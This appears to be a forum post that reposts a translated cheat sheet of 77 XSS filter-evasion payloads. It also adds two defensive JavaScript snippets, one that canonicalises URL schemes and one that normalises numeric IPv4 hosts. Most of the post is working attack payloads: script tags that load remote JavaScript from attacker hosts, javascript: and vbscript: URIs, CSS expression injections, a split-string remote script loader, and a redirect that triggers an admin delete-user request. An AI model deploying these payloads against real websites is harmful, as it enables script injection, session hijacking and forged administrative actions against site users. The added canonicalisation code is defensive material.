There doesn't seem to be much XSS material on t00ls, so when I saw something good I copied it over. Not sure whether anyone needs to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (the semicolon is required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line injected JavaScript; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around character limits (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters before the JavaScript
<IMG SRC=" javascript:alert('XSS');">
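
Vectors 3 to 19 all depend on what the browser does to an attribute value before it looks at the scheme: numeric character references are decoded (with or without the semicolon), tab, newline and carriage return are removed from inside the URL, leading control characters and spaces are trimmed, and the scheme match is case-insensitive. A defender has to canonicalise the same way before checking the scheme against an allow-list. The code below is an added example written for this post, not part of the copied cheat sheet; the function names, the small entity table and the sample inputs are my own, and the inputs only reuse the shapes of the vectors listed above.

```javascript
// Added defensive example (not from the copied cheat sheet): canonicalise a
// URL-bearing attribute value before deciding whether its scheme is allowed.
// Function names, the entity table and the inputs are constructed for this example.

const SAFE_SCHEMES = new Set(["http", "https", "mailto"]);

// Only the named references that matter for scheme smuggling; a real
// implementation would use the full HTML entity table.
const NAMED_ENTITIES = { tab: "\t", newline: "\n", colon: ":", lt: "<", gt: ">", quot: '"', amp: "&" };

function codePointOrReplacement(n) {
  // out-of-range references become U+FFFD instead of throwing
  return n > 0x10ffff ? "\uFFFD" : String.fromCodePoint(n);
}

// Decode numeric (hex and decimal) and a few named character references.
// Attribute values accept numeric references without the trailing semicolon,
// which is what the "no semicolon" vectors rely on.
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => codePointOrReplacement(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => codePointOrReplacement(parseInt(d, 10)))
    .replace(/&([a-z]+);?/gi, (m, name) => {
      const key = name.toLowerCase();
      return Object.prototype.hasOwnProperty.call(NAMED_ENTITIES, key) ? NAMED_ENTITIES[key] : m;
    });
}

// Apply the whitespace handling a URL parser performs: trim leading and
// trailing C0 controls and space, and remove tab, LF and CR anywhere inside.
// This is why "jav\tascript", "java\nscript" and " javascript" still reach the
// scheme check as "javascript". NUL is dropped too, which is stricter than
// modern parsers but the safe direction for an allow-list.
function canonicalUrl(value) {
  let s = decodeEntities(String(value));
  s = s.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "");
  s = s.replace(/[\u0000\t\n\r]/g, "");
  return s;
}

// True only when the canonical value has no scheme (a relative URL) or a
// scheme on the allow-list; javascript:, vbscript:, data: etc. are rejected.
function isSafeUrl(value) {
  const s = canonicalUrl(value);
  const m = /^([a-z][a-z0-9+.\-]*):/i.exec(s);
  if (!m) return true;
  return SAFE_SCHEMES.has(m[1].toLowerCase());
}

// Constructed inputs shaped like the vectors above, for running stand-alone.
const SAMPLE_VECTORS = [
  "javascript:alert('XSS')",
  "JaVaScRiPt:alert('XSS')",
  "jav\tascript:alert('XSS')",
  "jav&#x09;ascript:alert('XSS')",
  "&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58alert('XSS')",
  "java\u0000script:alert('XSS')",
  " &#14; javascript:alert('XSS')",
  "http://3w.org/",
  "//www.google.com/",
  "/images/a.png",
];

for (const v of SAMPLE_VECTORS) {
  console.log(isSafeUrl(v) ? "allow " : "block ", JSON.stringify(v), "->", JSON.stringify(canonicalUrl(v)));
}
```

This covers URL-carrying attributes only (SRC, HREF, BACKGROUND, DYNSRC, LOWSRC and the like). Event-handler attributes and CSS expression() values have no safe form and should be removed outright rather than canonicalised.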

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) JavaScript with escape filtering
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, you can sneak your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is being filtered, you can put the JS code inside an image file instead
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP as decimal
<A HREF="http://3232235521">XSS</A>

(71) IP as hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP as octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
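
Vectors 70 to 73 do not change the destination at all: they spell 192.168.0.1 (and, in the mixed case, 66.102.7.147) in the alternative numeric forms a URL parser accepts, namely one 32-bit decimal, hex octets, octal octets, or a mix with tabs spliced in. A filter that compares the raw host string against an allow-list or deny-list misses every one of them. The parser below is an added example, not part of the copied cheat sheet; it resolves those forms to a dotted quad following the IPv4 parsing rules of the WHATWG URL standard (function names and inputs are my own) so that the comparison is made on the real address.

```javascript
// Added defensive example (not from the copied cheat sheet): resolve the
// numeric host spellings of vectors 70-73 to a dotted quad the way the WHATWG
// URL parser does, so allow/deny lists compare against the real address.
// Function names and inputs are constructed for this example.

// Parse one component: 0x.. is hex, a leading zero means octal, else decimal.
// Returns null when the component is not a number in that radix.
function parseIpv4Number(part) {
  let radix = 10;
  let digits = part;
  if (/^0x/i.test(digits)) {
    radix = 16;
    digits = digits.slice(2);
  } else if (digits.length > 1 && digits[0] === "0") {
    radix = 8;
    digits = digits.slice(1);
  }
  if (digits === "") return 0; // "0x" on its own parses as zero
  const valid = radix === 16 ? /^[0-9a-f]+$/i : radix === 8 ? /^[0-7]+$/ : /^[0-9]+$/;
  return valid.test(digits) ? parseInt(digits, radix) : null;
}

// Returns "a.b.c.d" when host is a numeric IPv4 form, otherwise null.
// Tab, LF and CR are removed first, because the URL parser strips them from
// the whole input (that is what lets "6<TAB>6" read as "66").
function numericHostToDottedQuad(host) {
  if (host === "") return null;
  const parts = host.replace(/[\t\n\r]/g, "").split(".");
  if (parts.length > 1 && parts[parts.length - 1] === "") parts.pop(); // trailing dot
  if (parts.length === 0 || parts.length > 4) return null;
  const nums = parts.map((p) => parseIpv4Number(p));
  if (nums.some((n) => n === null)) return null;
  // every component but the last must fit one byte; the last fills the rest
  for (let i = 0; i < nums.length - 1; i++) if (nums[i] > 255) return null;
  const last = nums[nums.length - 1];
  if (last >= 256 ** (5 - nums.length)) return null;
  let ip = last;
  for (let i = 0; i < nums.length - 1; i++) ip += nums[i] * 256 ** (3 - i);
  return [ip >>> 24, (ip >>> 16) & 255, (ip >>> 8) & 255, ip & 255].join(".");
}

// Loopback, link-local, RFC 1918 and "this network" ranges.
function isPrivateIpv4(dotted) {
  const [a, b] = dotted.split(".").map(Number);
  return (
    a === 0 || a === 10 || a === 127 ||
    (a === 169 && b === 254) ||
    (a === 172 && b >= 16 && b <= 31) ||
    (a === 192 && b === 168)
  );
}

// What an allow-list should compare against: the dotted quad when the host
// is numeric, the host itself otherwise.
function canonicalHost(host) {
  return numericHostToDottedQuad(host) || host.toLowerCase();
}

// Constructed inputs matching vectors 70-73, plus a plain domain.
const SAMPLE_HOSTS = ["3232235521", "0xc0.0xa8.0x00.0x01", "0300.0250.0000.0001", "6\t6.000146.0x7.147", "www.google.com"];
for (const h of SAMPLE_HOSTS) {
  const c = canonicalHost(h);
  console.log(JSON.stringify(h), "->", c, numericHostToDottedQuad(h) && isPrivateIpv4(c) ? "(private)" : "");
}
```

WHATWG-based parsers such as Node's and the browsers' `new URL()` already apply this rule, so `new URL(href).hostname` yields the dotted quad; the practical point is that any host allow-list must be evaluated on the parsed hostname, never on the raw attribute string.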

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>